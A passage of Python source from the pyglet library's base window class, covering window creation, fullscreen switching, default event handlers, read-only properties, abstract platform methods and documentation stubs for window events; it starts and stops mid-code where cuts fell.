    #: Legacy invalidation flag introduced in pyglet 1.2: set by all event
    #: dispatches that go to non-empty handlers.  The default 1.2 event loop
    #: will therefore redraw after any handled event or scheduled function.
    _legacy_invalid = True

    # Instance variables accessible only via properties

    _width = None
    _height = None
    _caption = None
    _resizable = False
    _style = WINDOW_STYLE_DEFAULT
    _fullscreen = False
    _visible = False
    _vsync = False
    _screen = None
    _config = None
    _context = None

    # Used to restore window size and position after fullscreen
    _windowed_size = None
    _windowed_location = None

    # Subclasses should update these after relevant events
    _mouse_cursor = DefaultMouseCursor()
    _mouse_x = 0
    _mouse_y = 0
    _mouse_visible = True
    _mouse_exclusive = False
    _mouse_in_window = False

    _event_queue = None
    _enable_event_queue = True    # overridden by EventLoop.
    _allow_dispatch_event = False # controlled by dispatch_events stack frame

    # Class attributes

    _default_width = 640
    _default_height = 480

    def __init__(self,
                 width=None,
                 height=None,
                 caption=None,
                 resizable=False,
                 style=WINDOW_STYLE_DEFAULT,
                 fullscreen=False,
                 visible=True,
                 vsync=True,
                 display=None,
                 screen=None,
                 config=None,
                 context=None,
                 mode=None):
        """Create a window.

        All parameters are optional, and reasonable defaults are assumed
        where they are not specified.

        The `display`, `screen`, `config` and `context` parameters form
        a hierarchy of control: there is no need to specify more than 
        one of these.  For example, if you specify `screen` the `display`
        will be inferred, and a default `config` and `context` will be
        created.

        `config` is a special case; it can be a template created by the
        user specifying the attributes desired, or it can be a complete
        `config` as returned from `Screen.get_matching_configs` or similar.

        The context will be active as soon as the window is created, as if
        `switch_to` was just called.

        :Parameters:
            `width` : int
                Width of the window, in pixels.  Defaults to 640, or the
                screen width if `fullscreen` is True.
            `height` : int
                Height of the window, in pixels.  Defaults to 480, or the
                screen height if `fullscreen` is True.
            `caption` : str or unicode
                Initial caption (title) of the window.  Defaults to
                ``sys.argv[0]``.
            `resizable` : bool
                If True, the window will be resizable.  Defaults to False.
            `style` : int
                One of the ``WINDOW_STYLE_*`` constants specifying the
                border style of the window.
            `fullscreen` : bool
                If True, the window will cover the entire screen rather
                than floating.  Defaults to False.
            `visible` : bool
                Determines if the window is visible immediately after
                creation.  Defaults to True.  Set this to False if you
                would like to change attributes of the window before
                having it appear to the user.
            `vsync` : bool
                If True, buffer flips are synchronised to the primary screen's
                vertical retrace, eliminating flicker.
            `display` : `Display`
                The display device to use.  Useful only under X11.
            `screen` : `Screen`
                The screen to use, if in fullscreen.
            `config` : `pyglet.gl.Config`
                Either a template from which to create a complete config,
                or a complete config.
            `context` : `pyglet.gl.Context`
                The context to attach to this window.  The context must
                not already be attached to another window.
            `mode` : `ScreenMode`
                The screen will be switched to this mode if `fullscreen` is
                True.  If None, an appropriate mode is selected to accomodate
                `width` and `height.`

        """
        EventDispatcher.__init__(self)
        self._event_queue = []

        # Fill in the display -> screen -> config -> context chain from
        # whichever pieces the caller supplied; each level defaults from
        # the one above.
        if not display:
            display = get_platform().get_default_display()

        if not screen:
            screen = display.get_default_screen()

        if not config:
            # Prefer a double-buffered config with a 24-bit depth buffer,
            # then 16-bit; the final None template accepts any config.
            for template_config in [
                gl.Config(double_buffer=True, depth_size=24),
                gl.Config(double_buffer=True, depth_size=16),
                None]:
                try:
                    config = screen.get_best_config(template_config)
                    break
                except NoSuchConfigException:
                    pass
            if not config:
                raise NoSuchConfigException('No standard config is available.')

        if not config.is_complete():
            config = screen.get_best_config(config)

        if not context:
            context = config.create_context(gl.current_context)

        # Set these in reverse order to above, to ensure we get user
        # preference
        self._context = context
        self._config = self._context.config
        # XXX deprecate config's being screen-specific
        if hasattr(self._config, 'screen'):
            self._screen = self._config.screen
        else:
            display = self._config.canvas.display
            self._screen = display.get_default_screen()
        self._display = self._screen.display

        if fullscreen:
            if width is None and height is None:
                # Remember the default size so leaving fullscreen later
                # restores a sensible windowed size.
                self._windowed_size = self._default_width, self._default_height
            width, height = self._set_fullscreen_mode(mode, width, height)
            if not self._windowed_size:
                self._windowed_size = width, height
        else:
            if width is None:
                width = self._default_width
            if height is None:
                height = self._default_height

        self._width = width
        self._height = height
        self._resizable = resizable
        self._fullscreen = fullscreen
        self._style = style
        # The global pyglet 'vsync' option, when set, overrides the
        # per-window argument.
        if pyglet.options['vsync'] is not None:
            self._vsync = pyglet.options['vsync']
        else:
            self._vsync = vsync

        if caption is None:
            caption = sys.argv[0]
            # Decode hack for Python2 unicode support:
            if hasattr(caption, "decode"):
                try:
                    caption = caption.decode("utf8")
                except UnicodeDecodeError:
                    caption = "pyglet"
        self._caption = caption

        from pyglet import app
        app.windows.add(self)
        self._create()

        self.switch_to()
        if visible:
            self.set_visible(True)
            self.activate()

    def __del__(self):
        """Best-effort cleanup when the window object is garbage collected.

        Ensures the window is closed even if the application never called
        `close`.  Any error (for example the window is already closed, or
        attributes are gone during interpreter shutdown) is silently
        ignored.
        """
        try:
            self.close()
        except:
            pass

    def __repr__(self):
        """Return a debugging description, e.g. ``Window(width=640, height=480)``."""
        return '{0}(width={1:d}, height={2:d})'.format(
            type(self).__name__, self.width, self.height)

    def _create(self):
        """Create the platform window resources for this instance.

        Called once from `__init__` after the GL context is attached.
        """
        # Abstract: platform subclasses provide the implementation.
        raise NotImplementedError('abstract')

    def _recreate(self, changes):
        """Recreate the window with current attributes.

        :Parameters:
            `changes` : list of str
                List of attribute names that were changed since the last
                `_create` or `_recreate`.  For example, ``['fullscreen']``
                is given if the window is to be toggled to or from fullscreen. 
        """
        # Abstract: platform subclasses provide the implementation.
        raise NotImplementedError('abstract')

    def flip(self):
        """Swap the OpenGL front and back buffers.

        Call this method on a double-buffered window to update the
        visible display with the back buffer.  The contents of the back buffer
        is undefined after this operation.

        Windows are double-buffered by default.  This method is called
        automatically by `EventLoop` after the `on_draw` event.
        """
        # Abstract: platform subclasses provide the implementation.
        raise NotImplementedError('abstract')

    def switch_to(self):
        """Make this window the current OpenGL rendering context.

        Only one OpenGL context can be active at a time.  This method sets
        the current window's context to be current.  You should use this
        method in preference to `pyglet.gl.Context.set_current`, as it may
        perform additional initialisation functions.
        """
        # Abstract: platform subclasses provide the implementation.
        raise NotImplementedError('abstract')

    def set_fullscreen(self, fullscreen=True, screen=None, mode=None,
                       width=None, height=None):
        """Toggle to or from fullscreen.

        After toggling fullscreen, the GL context should have retained its
        state and objects, however the buffers will need to be cleared and
        redrawn.

        If `width` and `height` are specified and `fullscreen` is True, the
        screen may be switched to a different resolution that most closely
        matches the given size.  If the resolution doesn't match exactly,
        a higher resolution is selected and the window will be centered
        within a black border covering the rest of the screen.

        :Parameters:
            `fullscreen` : bool
                True if the window should be made fullscreen, False if it
                should be windowed.
            `screen` : Screen
                If not None and fullscreen is True, the window is moved to the
                given screen.  The screen must belong to the same display as
                the window.
            `mode` : `ScreenMode`
                The screen will be switched to the given mode.  The mode must
                have been obtained by enumerating `Screen.get_modes`.  If
                None, an appropriate mode will be selected from the given
                `width` and `height`.
            `width` : int
                Optional width of the window.  If unspecified, defaults to the
                previous window size when windowed, or the screen size if
                fullscreen.

                **Since:** pyglet 1.2
            `height` : int
                Optional height of the window.  If unspecified, defaults to
                the previous window size when windowed, or the screen size if
                fullscreen.

                **Since:** pyglet 1.2
        """
        # No-op when the requested state matches the current one.
        if (fullscreen == self._fullscreen and 
            (screen is None or screen is self._screen) and
            (width is None or width == self._width) and
            (height is None or height == self._height)):
            return

        if not self._fullscreen:
            # Save windowed size
            self._windowed_size = self.get_size()
            self._windowed_location = self.get_location()

        if fullscreen and screen is not None:
            # NOTE: assert is stripped under -O; screen must belong to
            # this window's display.
            assert screen.display is self.display
            self._screen = screen

        self._fullscreen = fullscreen
        if self._fullscreen:
            self._width, self._height = self._set_fullscreen_mode(
                mode, width, height)
        else:
            # Leaving fullscreen: restore the original screen mode, then
            # the saved windowed size (explicit arguments override it).
            self.screen.restore_mode()

            self._width, self._height = self._windowed_size
            if width is not None:
                self._width = width
            if height is not None:
                self._height = height

        self._recreate(['fullscreen'])

        if not self._fullscreen and self._windowed_location:
            # Restore windowed location.
            # TODO: Move into platform _create?
            # Not harmless on Carbon because upsets _width and _height
            # via _on_window_bounds_changed.
            if pyglet.compat_platform != 'darwin' or pyglet.options['darwin_cocoa']:
                self.set_location(*self._windowed_location)

    def _set_fullscreen_mode(self, mode, width, height):
        """Switch the screen mode for fullscreen and resolve the size.

        Returns the (width, height) the fullscreen window should use.
        """
        screen = self.screen
        if mode is not None:
            # Explicit mode: switch to it; unspecified dimensions default
            # to the screen size.
            screen.set_mode(mode)
            width = screen.width if width is None else width
            height = screen.height if height is None else height
        elif width is None and height is None:
            # No constraints: keep the current mode and fill the screen.
            width = screen.width
            height = screen.height
        else:
            # A specific size was requested: switch to the closest mode.
            if width is None:
                width = 0
            if height is None:
                height = 0
            mode = screen.get_closest_mode(width, height)
            if mode is not None:
                screen.set_mode(mode)
            elif screen.get_modes():
                # Only raise when mode switching is possible at all.
                raise NoSuchScreenModeException(
                    'No mode matching %dx%d' % (width, height))
        return width, height

    def on_resize(self, width, height):
        """Default resize handler: viewport plus orthographic projection.

        Sets the GL viewport to cover the whole window and loads an
        orthogonal ``GL_PROJECTION`` matrix in window space: (0, 0) at
        the bottom-left, (width, height) at the top-right, in pixels.
        Leaves ``GL_MODELVIEW`` as the current matrix mode.

        Override this handler to install a different projection, for
        example in perspective.
        """
        # Clamp to 1x1: a zero-sized viewport raises GLException.
        width, height = max(1, width), max(1, height)
        gl.glViewport(0, 0, width, height)
        gl.glMatrixMode(gl.GL_PROJECTION)
        gl.glLoadIdentity()
        gl.glOrtho(0, width, 0, height, -1, 1)
        gl.glMatrixMode(gl.GL_MODELVIEW)

    def on_close(self):
        """Default close handler: flag exit and close if the app loop runs."""
        from pyglet import app
        self.has_exit = True
        if app.event_loop.is_running:
            self.close()

    def on_key_press(self, symbol, modifiers):
        """Default key press handler: Escape dispatches `on_close`.

        Lock modifiers (num, caps, scroll lock) are ignored; any other
        held modifier suppresses the close.
        """
        lock_mask = key.MOD_NUMLOCK | key.MOD_CAPSLOCK | key.MOD_SCROLLLOCK
        if symbol == key.ESCAPE and not (modifiers & ~lock_mask):
            self.dispatch_event('on_close')

    def close(self):
        """Close the window.

        After closing the window, the GL context will be invalid.  The
        window instance cannot be reused once closed (see also `set_visible`).

        The `pyglet.app.EventLoop.on_window_close` event is dispatched on
        `pyglet.app.event_loop` when this method is called.
        """
        from pyglet import app
        if not self._context:
            # Already closed (or never fully created); nothing to do.
            return
        app.windows.remove(self)
        self._context.destroy()
        self._config = None
        self._context = None
        if app.event_loop:
            app.event_loop.dispatch_event('on_window_close', self)
        self._event_queue = []

    def draw_mouse_cursor(self):
        """Draw the custom mouse cursor.

        If the current mouse cursor has ``drawable`` set, this method
        is called before the buffers are flipped to render it.  
        
        This method always leaves the ``GL_MODELVIEW`` matrix as current,
        regardless of what it was set to previously.  No other GL state
        is affected.

        There is little need to override this method; instead, subclass
        ``MouseCursor`` and provide your own ``draw`` method.
        """
        # Draw mouse cursor if set and visible.
        # XXX leaves state in modelview regardless of starting state
        if (self._mouse_cursor.drawable and
            self._mouse_visible and
            self._mouse_in_window):
            # Install a pixel-aligned orthographic projection, saving the
            # caller's projection and modelview matrices on their stacks.
            gl.glMatrixMode(gl.GL_PROJECTION)
            gl.glPushMatrix()
            gl.glLoadIdentity()
            gl.glOrtho(0, self.width, 0, self.height, -1, 1)

            gl.glMatrixMode(gl.GL_MODELVIEW)
            gl.glPushMatrix()
            gl.glLoadIdentity()

            self._mouse_cursor.draw(self._mouse_x, self._mouse_y)

            # Restore both matrices, leaving GL_MODELVIEW current.
            gl.glMatrixMode(gl.GL_PROJECTION)
            gl.glPopMatrix()

            gl.glMatrixMode(gl.GL_MODELVIEW)
            gl.glPopMatrix()

    # Properties provide read-only access to instance variables.  Use
    # set_* methods to change them if applicable.

    @property
    def caption(self):
        """The window caption (title).  Read-only.

        :type: str
        """
        # Change via `set_caption`.
        return self._caption

    @property
    def resizeable(self):
        """True if the window is resizable.  Read-only.

        :type: bool
        """
        # NOTE(review): the property name keeps the historical
        # misspelling ("resizeable"); renaming would break callers.
        return self._resizable

    @property
    def style(self):
        """The window style; one of the ``WINDOW_STYLE_*`` constants.
        Read-only.

        :type: int
        """
        # Set from the constructor's `style` argument.
        return self._style

    @property
    def fullscreen(self):
        """True if the window is currently fullscreen.  Read-only.

        :type: bool
        """
        # Toggle via `set_fullscreen`.
        return self._fullscreen

    @property
    def visible(self):
        """True if the window is currently visible.  Read-only.

        :type: bool
        """
        # Request changes via `set_visible`.
        return self._visible

    @property
    def vsync(self):
        """True if buffer flips are synchronised to the screen's vertical
        retrace.  Read-only.

        :type: bool
        """
        # Change via `set_vsync`.
        return self._vsync

    @property
    def display(self):
        """The display this window belongs to.  Read-only.

        :type: `Display`
        """
        # Fixed in __init__ from the screen's display.
        return self._display

    @property
    def screen(self):
        """The screen this window is fullscreen in.  Read-only.

        :type: `Screen`
        """
        # May change when `set_fullscreen` moves the window to another screen.
        return self._screen

    @property
    def config(self):
        """A GL config describing the context of this window.  Read-only.

        :type: `pyglet.gl.Config`
        """
        # None after `close`.
        return self._config

    @property
    def context(self):
        """The OpenGL context attached to this window.  Read-only.

        :type: `pyglet.gl.Context`
        """
        # None after `close`.
        return self._context

    # These are the only properties that can be set
    @property
    def width(self):
        """The width of the window, in pixels.  Read-write.

        :type: int
        """
        # Queried live from the platform via `get_size`.
        return self.get_size()[0]

    @width.setter
    def width(self, new_width):
        # Delegates to `set_size`, preserving the current height.
        self.set_size(new_width, self.height)

    @property
    def height(self):
        """The height of the window, in pixels.  Read-write.

        :type: int
        """
        # Queried live from the platform via `get_size`.
        return self.get_size()[1]

    @height.setter
    def height(self, new_height):
        # Delegates to `set_size`, preserving the current width.
        self.set_size(self.width, new_height)

    def set_caption(self, caption):
        """Set the window's caption.

        The caption appears in the titlebar of the window, if it has one,
        and in the taskbar on Windows and many X11 window managers.

        :Parameters:
            `caption` : str or unicode
                The caption to set.

        """
        # Abstract: platform subclasses provide the implementation.
        raise NotImplementedError('abstract')

    def set_minimum_size(self, width, height):
        """Set the minimum size of the window.

        Once set, the user will not be able to resize the window smaller
        than the given dimensions.  There is no way to remove the
        minimum size constraint on a window (but you could set it to 0,0).

        The behaviour is undefined if the minimum size is set larger than
        the current size of the window.

        The window size does not include the border or title bar.

        :Parameters:
            `width` : int
                Minimum width of the window, in pixels.
            `height` : int
                Minimum height of the window, in pixels.

        """
        # Abstract: platform subclasses provide the implementation.
        raise NotImplementedError('abstract')

    def set_maximum_size(self, width, height):
        """Set the maximum size of the window.

        Once set, the user will not be able to resize the window larger
        than the given dimensions.  There is no way to remove the
        maximum size constraint on a window (but you could set it to a large
        value).

        The behaviour is undefined if the maximum size is set smaller than
        the current size of the window.

        The window size does not include the border or title bar.

        :Parameters:
            `width` : int
                Maximum width of the window, in pixels.
            `height` : int
                Maximum height of the window, in pixels.

        """
        # Abstract: platform subclasses provide the implementation.
        raise NotImplementedError('abstract')

    def set_size(self, width, height):
        """Resize the window.
        
        The behaviour is undefined if the window is not resizable, or if
        it is currently fullscreen.

        The window size does not include the border or title bar.

        :Parameters:
            `width` : int
                New width of the window, in pixels.
            `height` : int
                New height of the window, in pixels.

        """
        # Abstract: platform subclasses provide the implementation.
        raise NotImplementedError('abstract')

    def get_size(self):
        """Return the current size of the window.

        The window size does not include the border or title bar.

        :rtype: (int, int)
        :return: The width and height of the window, in pixels.
        """
        # Abstract: platform subclasses provide the implementation.
        raise NotImplementedError('abstract')

    def set_location(self, x, y):
        """Set the position of the window.

        :Parameters:
            `x` : int
                Distance of the left edge of the window from the left edge
                of the virtual desktop, in pixels.
            `y` : int
                Distance of the top edge of the window from the top edge of
                the virtual desktop, in pixels.

        """
        # Abstract: platform subclasses provide the implementation.
        raise NotImplementedError('abstract')

    def get_location(self):
        """Return the current position of the window.

        :rtype: (int, int)
        :return: The distances of the left and top edges from their respective
            edges on the virtual desktop, in pixels.
        """
        # Abstract: platform subclasses provide the implementation.
        raise NotImplementedError('abstract')

    def activate(self):
        """Attempt to restore keyboard focus to the window.

        Depending on the window manager or operating system, this may not
        be successful.  For example, on Windows XP an application is not
        allowed to "steal" focus from another application.  Instead, the
        window's taskbar icon will flash, indicating it requires attention.
        """
        # Abstract: platform subclasses provide the implementation.
        raise NotImplementedError('abstract')

    def set_visible(self, visible=True):
        """Show or hide the window.

        :Parameters:
            `visible` : bool
                If True, the window will be shown; otherwise it will be
                hidden.

        """
        # Abstract: platform subclasses provide the implementation.
        raise NotImplementedError('abstract')

    def minimize(self):
        """Minimize the window.
        """
        # Abstract: platform subclasses provide the implementation.
        raise NotImplementedError('abstract')

    def maximize(self):
        """Maximize the window.

        The behaviour of this method is somewhat dependent on the user's
        display setup.  On a multi-monitor system, the window may maximize
        to either a single screen or the entire virtual desktop.
        """
        # Abstract: platform subclasses provide the implementation.
        raise NotImplementedError('abstract')

    def set_vsync(self, vsync):
        """Enable or disable vertical sync control.

        When enabled, this option ensures flips from the back to the front
        buffer are performed only during the vertical retrace period of the
        primary display.  This can prevent "tearing" or flickering when
        the buffer is updated in the middle of a video scan.

        Note that LCD monitors have an analogous time in which they are not
        reading from the video buffer; while it does not correspond to
        a vertical retrace it has the same effect.

        With multi-monitor systems the secondary monitor cannot be
        synchronised to, so tearing and flicker cannot be avoided when the
        window is positioned outside of the primary display.  In this case
        it may be advisable to forcibly reduce the framerate (for example,
        using `pyglet.clock.set_fps_limit`).

        :Parameters:
            `vsync` : bool
                If True, vsync is enabled, otherwise it is disabled.

        """
        # Abstract: platform subclasses provide the implementation.
        raise NotImplementedError('abstract')

    def set_mouse_visible(self, visible=True):
        """Show or hide the mouse cursor.

        The mouse cursor will only be hidden while it is positioned within
        this window.  Mouse events will still be processed as usual.

        :Parameters:
            `visible` : bool
                If True, the mouse cursor will be visible, otherwise it
                will be hidden.

        """
        # Record the desired state, then let the platform layer apply it.
        self._mouse_visible = visible
        self.set_mouse_platform_visible()

    def set_mouse_platform_visible(self, platform_visible=None):
        """Set the platform-drawn mouse cursor visibility.  This is called
        automatically after changing the mouse cursor or exclusive mode.

        Applications should not normally need to call this method, see
        `set_mouse_visible` instead.

        :Parameters:
            `platform_visible` : bool or None
                If None, sets platform visibility to the required visibility
                for the current exclusive mode and cursor type.  Otherwise,
                a bool value will override and force a visibility.

        """
        # Abstract: platform subclasses provide the implementation.
        raise NotImplementedError()

    def set_mouse_cursor(self, cursor=None):
        """Change the appearance of the mouse cursor.

        The appearance of the mouse cursor is only changed while it is
        within this window.

        :Parameters:
            `cursor` : `MouseCursor`
                The cursor to set, or None to restore the default cursor.

        """
        # None restores the default cursor; then re-sync platform visibility.
        self._mouse_cursor = DefaultMouseCursor() if cursor is None else cursor
        self.set_mouse_platform_visible()

    def set_exclusive_mouse(self, exclusive=True):
        """Hide the mouse cursor and direct all mouse events to this
        window.

        When enabled, this feature prevents the mouse leaving the window.  It
        is useful for certain styles of games that require complete control of
        the mouse.  The position of the mouse as reported in subsequent events
        is meaningless when exclusive mouse is enabled; you should only use
        the relative motion parameters ``dx`` and ``dy``.

        :Parameters:
            `exclusive` : bool
                If True, exclusive mouse is enabled, otherwise it is disabled.

        """
        # Abstract: platform subclasses provide the implementation.
        raise NotImplementedError('abstract')

    def set_exclusive_keyboard(self, exclusive=True):
        """Prevent the user from switching away from this window using
        keyboard accelerators.

        When enabled, this feature disables certain operating-system specific
        key combinations such as Alt+Tab (Command+Tab on OS X).  This can be
        useful in certain kiosk applications, it should be avoided in general
        applications or games.

        :Parameters:
            `exclusive` : bool
                If True, exclusive keyboard is enabled, otherwise it is
                disabled.

        """
        # Abstract: platform subclasses provide the implementation.
        raise NotImplementedError('abstract')

    def get_system_mouse_cursor(self, name):
        """Obtain a system mouse cursor.

        The returned cursor can be activated with `set_mouse_cursor`.
        Valid names are the ``CURSOR_*`` constants defined on this class.

        :Parameters:
            `name` : str
                Name describing the mouse cursor to return.  For example,
                ``CURSOR_WAIT``, ``CURSOR_HELP``, etc.

        :rtype: `MouseCursor`
        :return: A mouse cursor which can be used with `set_mouse_cursor`.
        """
        # Platform subclasses must override this.
        raise NotImplementedError()

    def set_icon(self, *images):
        """Set the window icon.

        When several images are supplied, the one closest to the required
        size is chosen (and scaled if no exact match exists).  Useful
        sizes to provide are 16x16, 32x32, 64x64 (Mac only) and 128x128
        (Mac only).

        :Parameters:
            `images` : sequence of `pyglet.image.AbstractImage`
                List of images to use for the window icon.

        """
        # No-op here; platform subclasses provide the implementation.
        pass

    def clear(self):
        """Clear the window.

        Convenience method that clears both the color and depth buffers.
        The window must be the active context (see `switch_to`).
        """
        gl.glClear(gl.GL_DEPTH_BUFFER_BIT | gl.GL_COLOR_BUFFER_BIT)
    
    def dispatch_event(self, *args):
        # Queue the event when queueing is enabled and dispatch is not
        # explicitly allowed at this moment.
        if self._enable_event_queue and not self._allow_dispatch_event:
            self._event_queue.append(args)
            return
        # Only a handler returning exactly False skips marking the window
        # as needing a legacy redraw.
        if EventDispatcher.dispatch_event(self, *args) != False:
            self._legacy_invalid = True

    def dispatch_events(self):
        """Poll the operating system event queue for new events and call
        attached event handlers.

        Provided for legacy applications targeting pyglet 1.0 and for
        advanced applications that integrate their event loop into
        another framework; typical applications should use
        `pyglet.app.run`.
        """
        # Platform subclasses must override this.
        raise NotImplementedError('abstract')

    # If documenting, show the event methods.  Otherwise, leave them out
    # as they are not really methods.
    if _is_epydoc:
        def on_key_press(symbol, modifiers):
            """A key on the keyboard was pressed (and held down).

            In pyglet 1.0 the default handler sets `has_exit` to ``True`` if
            the ``ESC`` key is pressed.

            In pyglet 1.1 the default handler dispatches the `on_close`
            event if the ``ESC`` key is pressed.

            :Parameters:
                `symbol` : int
                    The key symbol pressed.
                `modifiers` : int
                    Bitwise combination of the key modifiers active.
            
            :event:
            """

        def on_key_release(symbol, modifiers):
            """A key on the keyboard was released.

            :Parameters:
                `symbol` : int
                    The key symbol pressed.
                `modifiers` : int
                    Bitwise combination of the key modifiers active.

            :event:
            """

        def on_text(text):
            """The user input some text.

            Typically this is called after `on_key_press` and before
            `on_key_release`, but may also be called multiple times if the key
            is held down (key repeating); or called without key presses if
            another input method was used (e.g., a pen input).

            You should always use this method for interpreting text, as the
            key symbols often have complex mappings to their unicode
            representation which this event takes care of.

            :Parameters:
                `text` : unicode
                    The text entered by the user.

            :event:
            """

        def on_text_motion(motion):
            """The user moved the text input cursor.

            Typically this is called after `on_key_press` and before
            `on_key_release`, but may also be called multiple times if the key
            is held down (key repeating).

            You should always use this method for moving the text input cursor
            (caret), as different platforms have different default keyboard
            mappings, and key repeats are handled correctly.

            The values that `motion` can take are defined in
            `pyglet.window.key`:

            * MOTION_UP
            * MOTION_RIGHT
            * MOTION_DOWN
            * MOTION_LEFT
            * MOTION_NEXT_WORD
            * MOTION_PREVIOUS_WORD
            * MOTION_BEGINNING_OF_LINE
            * MOTION_END_OF_LINE
            * MOTION_NEXT_PAGE
            * MOTION_PREVIOUS_PAGE
            * MOTION_BEGINNING_OF_FILE
            * MOTION_END_OF_FILE
            * MOTION_BACKSPACE
            * MOTION_DELETE

            :Parameters:
                `motion` : int
                    The direction of motion; see remarks.

            :event:
            """

        def on_text_motion_select(motion):
            """The user moved the text input cursor while extending the
            selection.

            Typically this is called after `on_key_press` and before
            `on_key_release`, but may also be called multiple times if the key
            is held down (key repeating).

            You should always use this method for responding to text selection
            events rather than the raw `on_key_press`, as different platforms
            have different default keyboard mappings, and key repeats are
            handled correctly.

            The values that `motion` can take are defined in `pyglet.window.key`:

            * MOTION_UP
            * MOTION_RIGHT
            * MOTION_DOWN
            * MOTION_LEFT
            * MOTION_NEXT_WORD
            * MOTION_PREVIOUS_WORD
            * MOTION_BEGINNING_OF_LINE
            * MOTION_END_OF_LINE
            * MOTION_NEXT_PAGE
            * MOTION_PREVIOUS_PAGE
            * MOTION_BEGINNING_OF_FILE
            * MOTION_END_OF_FILE

            :Parameters:
                `motion` : int
                    The direction of selection motion; see remarks.

            :event:
            """

        def on_mouse_motion(x, y, dx, dy):
            """The mouse was moved with no buttons held down.

            :Parameters:
                `x` : int
                    Distance in pixels from the left edge of the window.
                `y` : int
                    Distance in pixels from the bottom edge of the window.
                `dx` : int
                    Relative X position from the previous mouse position.
                `dy` : int
                    Relative Y position from the previous mouse position.

            :event:
            """

        def on_mouse_drag(x, y, dx, dy, buttons, modifiers):
            """The mouse was moved with one or more mouse buttons pressed.

            This event will continue to be fired even if the mouse leaves
            the window, so long as the drag buttons are continuously held down.

            :Parameters:
                `x` : int
                    Distance in pixels from the left edge of the window.
                `y` : int
                    Distance in pixels from the bottom edge of the window.
                `dx` : int
                    Relative X position from the previous mouse position.
                `dy` : int
                    Relative Y position from the previous mouse position.
                `buttons` : int
                    Bitwise combination of the mouse buttons currently pressed.
                `modifiers` : int
                    Bitwise combination of any keyboard modifiers currently
                    active.

            :event:
            """

        def on_mouse_press(x, y, button, modifiers):
            """A mouse button was pressed (and held down).

            :Parameters:
                `x` : int
                    Distance in pixels from the left edge of the window.
                `y` : int
                    Distance in pixels from the bottom edge of the window.
                `button` : int
                    The mouse button that was pressed.
                `modifiers` : int
                    Bitwise combination of any keyboard modifiers currently
                    active.
                
            :event:
            """

        def on_mouse_release(x, y, button, modifiers):
            """A mouse button was released.

            :Parameters:
                `x` : int
                    Distance in pixels from the left edge of the window.
                `y` : int
                    Distance in pixels from the bottom edge of the window.
                `button` : int
                    The mouse button that was released.
                `modifiers` : int
                    Bitwise combination of any keyboard modifiers currently
                    active.

            :event:
            """
                
        def on_mouse_scroll(x, y, scroll_x, scroll_y):
            """The mouse wheel was scrolled.

            Note that most mice have only a vertical scroll wheel, so
            `scroll_x` is usually 0.  An exception to this is the Apple Mighty
            Mouse, which has a mouse ball in place of the wheel which allows
            both `scroll_x` and `scroll_y` movement.

            :Parameters:
                `x` : int
                    Distance in pixels from the left edge of the window.
                `y` : int
                    Distance in pixels from the bottom edge of the window.
                `scroll_x` : int
                    Number of "clicks" towards the right (left if negative).
                `scroll_y` : int
                    Number of "clicks" upwards (downwards if negative).

            :event:
            """

        def on_close():
            """The user attempted to close the window.

            This event can be triggered by clicking on the "X" control box in
            the window title bar, or by some other platform-dependent manner.

            The default handler sets `has_exit` to ``True``.  In pyglet 1.1, if
            `pyglet.app.event_loop` is being used, `close` is also called,
            closing the window immediately.

            :event:
            """

        def on_mouse_enter(x, y):
            """The mouse was moved into the window.

            This event will not be triggered if the mouse is currently being
            dragged.

            :Parameters:
                `x` : int
                    Distance in pixels from the left edge of the window.
                `y` : int
                    Distance in pixels from the bottom edge of the window.

            :event:
            """

        def on_mouse_leave(x, y):
            """The mouse was moved outside of the window.

            This event will not be triggered if the mouse is currently being
            dragged.  Note that the coordinates of the mouse pointer will be
            outside of the window rectangle.

            :Parameters:
                `x` : int
                    Distance in pixels from the left edge of the window.
                `y` : int
                    Distance in pixels from the bottom edge of the window.

            :event:
            """

        def on_expose():
            """A portion of the window needs to be redrawn.

            This event is triggered when the window first appears, and any time
            the contents of the window is invalidated due to another window
            obscuring it.

            There is no way to determine which portion of the window needs
            redrawing.  Note that the use of this method is becoming
            increasingly uncommon, as newer window managers composite windows
            automatically and keep a backing store of the window contents.

            :event:
            """

        def on_resize(width, height):
            """The window was resized.

            The window will have the GL context when this event is dispatched;
            there is no need to call `switch_to` in this handler.

            :Parameters:
                `width` : int
                    The new width of the window, in pixels.
                `height` : int
                    The new height of the window, in pixels.

            :event:
            """

        def on_move(x, y):
            """The window was moved.

            :Parameters:
                `x` : int
                    Distance from the left edge of the screen to the left edge
                    of the window.
                `y` : int
                    Distance from the top edge of the screen to the top edge of
                    the window.  Note that this is one of few methods in pyglet
                    which use a Y-down coordinate system.

            :event:
            """

        def on_activate():
            """The window was activated.

            This event can be triggered by clicking on the title bar, bringing
            it to the foreground; or by some platform-specific method.

            When a window is "active" it has the keyboard focus.

            :event:
            """

        def on_deactivate():
            """The window was deactivated.

            This event can be triggered by clicking on another application
            window.  When a window is deactivated it no longer has the
            keyboard focus.

            :event:
            """

        def on_show():
            """The window was shown.

            This event is triggered when a window is restored after being
            minimised, or after being displayed for the first time.

            :event:
            """

        def on_hide():
            """The window was hidden.

            This event is triggered when a window is minimised or (on Mac OS X)
            hidden by the user.

            :event:
            """

        def on_context_lost():
            """The window's GL context was lost.
            
            When the context is lost no more GL methods can be called until it
            is recreated.  This is a rare event, triggered perhaps by the user
            switching to an incompatible video mode.  When it occurs, an
            application will need to reload all objects (display lists, texture
            objects, shaders) as well as restore the GL state.

            :event:
            """

        def on_context_state_lost():
            """The state of the window's GL context was lost.

            pyglet may sometimes need to recreate the window's GL context if
            the window is moved to another video device, or between fullscreen
            or windowed mode.  In this case it will try to share the objects
            (display lists, texture objects, shaders) between the old and new
            contexts.  If this is possible, only the current state of the GL
            context is lost, and the application should simply restore state.

            :event:
            """

        def on_draw():
            """The window contents must be redrawn.

            The `EventLoop` will dispatch this event when the window
            should be redrawn.  This will happen during idle time after
            any window events and after any scheduled functions were called.

            The window will already have the GL context, so there is no
            need to call `switch_to`.  The window's `flip` method will
            be called after this event, so your event handler should not.

            You should make no assumptions about the window contents when
            this event is triggered; a resize or expose event may have
            invalidated the framebuffer since the last time it was drawn.

            :since: pyglet 1.1

            :event:
            """

# Register every standard window event type on BaseWindow so instances
# can dispatch them through the EventDispatcher machinery.
for _event_name in ('on_key_press', 'on_key_release', 'on_text',
                    'on_text_motion', 'on_text_motion_select',
                    'on_mouse_motion', 'on_mouse_drag', 'on_mouse_press',
                    'on_mouse_release', 'on_mouse_scroll', 'on_mouse_enter',
                    'on_mouse_leave', 'on_close', 'on_expose', 'on_resize',
                    'on_move', 'on_activate', 'on_deactivate', 'on_show',
